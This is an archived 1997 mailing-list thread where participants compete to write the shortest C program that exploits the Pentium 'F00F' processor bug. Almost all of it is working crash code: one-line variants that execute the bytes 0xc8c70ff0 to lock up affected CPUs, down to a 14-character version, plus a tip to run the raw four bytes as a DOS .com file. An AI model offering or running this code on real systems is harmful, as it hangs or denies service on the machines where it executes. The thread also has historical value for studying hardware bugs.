In the grand tradition of RSA-in-3-lines-of-perl, we present Crash-A-Pentium-in-44-characters: main(){int i=0xc8c70ff0;void (*f)()=&i;f();} - f00fie
f00fie writes:
In the grand tradition of RSA-in-3-lines-of-perl, we present Crash-A-Pentium-in-44-characters:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();}
Hey, challenge is on: main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */ main(){((int(*)())"\360\017\307\310")();} main(){int i=0xc8c70ff0,(*f)()=&i;f();} main(i){int(*f)()=&i;i=0xc8c70ff0;f();} main(i){i=0xc8c70ff0;((int(*)())&i)();} (*f)();main(i){f=&i;i=0xc8c70ff0;f();} (*f)()="\360\017\307\310";main(){f();} /* 38 chars */ Compiled with gcc. (Note that I haven't tested them because I have an AMD k5 which doesn't suffer from this bug -- perhaps someone with an Intel pentium could try them). Adam
On Fri, 14 Nov 1997, Adam Back wrote:
f00fie writes:
In the grand tradition of RSA-in-3-lines-of-perl, we present Crash-A-Pentium-in-44-characters:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();}
Hey, challenge is on:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */ main(){((int(*)())"\360\017\307\310")();} main(){int i=0xc8c70ff0,(*f)()=&i;f();} main(i){int(*f)()=&i;i=0xc8c70ff0;f();} main(i){i=0xc8c70ff0;((int(*)())&i)();} (*f)();main(i){f=&i;i=0xc8c70ff0;f();} (*f)()="\360\017\307\310";main(){f();} /* 38 chars */
Compiled with gcc.
How about: long main[]={0xc8c70ff0}; or even main[]={0xc8c70ff0}; /* 21 chars */ Compiles with gcc, but I haven't tested it.
Michael Stutz writes:
On Fri, 14 Nov 1997, Adam Back wrote:
f00fie writes:
In the grand tradition of RSA-in-3-lines-of-perl, we present Crash-A-Pentium-in-44-characters:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();}
Hey, challenge is on:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */ main(){((int(*)())"\360\017\307\310")();} main(){int i=0xc8c70ff0,(*f)()=&i;f();} main(i){int(*f)()=&i;i=0xc8c70ff0;f();} main(i){i=0xc8c70ff0;((int(*)())&i)();} (*f)();main(i){f=&i;i=0xc8c70ff0;f();} (*f)()="\360\017\307\310";main(){f();} /* 38 chars */
How about:
long main[]={0xc8c70ff0};
or even
main[]={0xc8c70ff0}; /* 21 chars */
Compiles with gcc, but I haven't tested it.
No need for an array, so my entry is: int main=0xc8c70ff0; /* 20 chars */ Compiles and runs, core dumping with illegal instruction on my Linux box (obviously, it's not a Pentium). -- Jeff
On Fri, 14 Nov 1997, Jeff Barber wrote:
No need for an array, so my entry is:
int main=0xc8c70ff0; /* 20 chars */
Cool. This also compiles: main=0xc8c70ff0; /* 14 chars */ Just as many chars as the assembly code, f00f.s: lock cmpxch8b [can unknown intructions like this be force compiled?]
main(i){int(*f)()=&i;i=0xc8c70ff0;f();} main(i){i=0xc8c70ff0;((int(*)())&i)();} (*f)();main(i){f=&i;i=0xc8c70ff0;f();} (*f)()="\360\017\307\310";main(){f();} /* 38 chars */
How about:
long main[]={0xc8c70ff0};
or even
main[]={0xc8c70ff0}; /* 21 chars */
Compiles with gcc, but I haven't tested it.
No need for an array, so my entry is:
int main=0xc8c70ff0; /* 20 chars */
On a DOS box, no need to compile. Cut-n-paste the magic words into a file. Name the file "foof.com". Run it. 4 bytes. I win. :-) Bryce P.S. Not original with me. Attribution lost in the mists of comp.sys.intel.
int main=0xc8c70ff0; igor Adam Back wrote:
f00fie writes:
In the grand tradition of RSA-in-3-lines-of-perl, we present Crash-A-Pentium-in-44-characters:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();}
Hey, challenge is on:
main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */ main(){((int(*)())"\360\017\307\310")();} main(){int i=0xc8c70ff0,(*f)()=&i;f();} main(i){int(*f)()=&i;i=0xc8c70ff0;f();} main(i){i=0xc8c70ff0;((int(*)())&i)();} (*f)();main(i){f=&i;i=0xc8c70ff0;f();} (*f)()="\360\017\307\310";main(){f();} /* 38 chars */
Compiled with gcc.
(Note that I haven't tested them because I have an AMD k5 which doesn't suffer from this bug -- perhaps someone with an Intel pentium could try them).
Adam
- Igor.
participants (6)
-
Adam Back -
Anonymous -
Bryce -
ichudov@algebra.com -
Jeff Barber -
Michael Stutz